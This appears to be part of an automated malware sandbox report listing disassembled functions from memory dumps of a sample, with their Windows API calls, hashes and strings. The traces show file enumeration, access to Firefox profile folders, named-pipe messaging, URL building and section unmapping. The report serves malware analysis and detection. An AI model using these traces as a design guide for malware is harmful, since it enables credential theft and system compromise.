    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32B25, Relevance: 10.6, APIs: 7, Instructions: 98 Total matches: 51file
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5C23, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59 Total matches: 27stringtime
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6C08, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141 Total matches: 19registrysynchronization
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
